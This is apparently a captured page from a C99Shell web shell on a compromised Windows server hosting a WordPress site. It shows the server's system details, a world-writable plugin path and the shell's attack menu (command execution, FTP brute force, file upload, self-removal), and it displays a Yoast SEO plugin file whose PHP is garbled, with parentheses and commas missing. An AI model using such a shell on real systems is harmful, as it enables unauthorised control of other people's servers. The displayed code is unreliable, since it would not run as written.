!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\cumbreclima\wp-content\plugins\wordpress-seo\admin\   drwxrwxrwx
Free 4.13 GB of 39.52 GB (10.45%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     class-admin-user-profile.php (2 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * @package WPSEO\Admin
 * @since      1.8.0
 */

/**
 * Customizes user profile.
 */
class WPSEO_Admin_User_Profile {
    
/**
     * Class constructor
     */
    
public function __construct() {
        
add_action'show_user_profile', array( $this'user_profile' ) );
        
add_action'edit_user_profile', array( $this'user_profile' ) );
        
add_action'personal_options_update', array( $this'process_user_option_update' ) );
        
add_action'edit_user_profile_update', array( $this'process_user_option_update' ) );
    }

    
/**
     * Filter POST variables.
     *
     * @param string $var_name
     *
     * @return mixed
     */
    
private function filter_input_post$var_name ) {
        
$val filter_inputINPUT_POST$var_name );
        if ( 
$val ) {
            return 
WPSEO_Option::sanitize_text_field$val );
        }
        return 
'';
    }

    
/**
     * Updates the user metas that (might) have been set on the user profile page.
     *
     * @param    int $user_id of the updated user
     */
    
public function process_user_option_update$user_id ) {

        if ( 
current_user_can'edit_user'$user_id ) ) {
            
update_user_meta$user_id'_yoast_wpseo_profile_updated'time() );
        }

        if ( 
$this->filter_input_post'wpseo_author_title' ) ) {
            
check_admin_referer'wpseo_user_profile_update''wpseo_nonce' );
            
update_user_meta$user_id'wpseo_title'$this->filter_input_post'wpseo_author_title' ) );
            
update_user_meta$user_id'wpseo_metadesc'$this->filter_input_post'wpseo_author_metadesc' ) );
            
update_user_meta$user_id'wpseo_metakey'$this->filter_input_post'wpseo_author_metakey' ) );
            
update_user_meta$user_id'wpseo_excludeauthorsitemap'$this->filter_input_post'wpseo_author_exclude' ) );
        }
    }

    
/**
     * Add the inputs needed for SEO values to the User Profile page
     *
     * @param    object $user
     */
    
public function user_profile$user ) {

        if ( ! 
current_user_can'edit_users' ) ) {
            return;
        }

        
$options WPSEO_Options::get_all();

        
wp_nonce_field'wpseo_user_profile_update''wpseo_nonce' );

        require_once( 
'views/user-profile.php' );
    }

}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--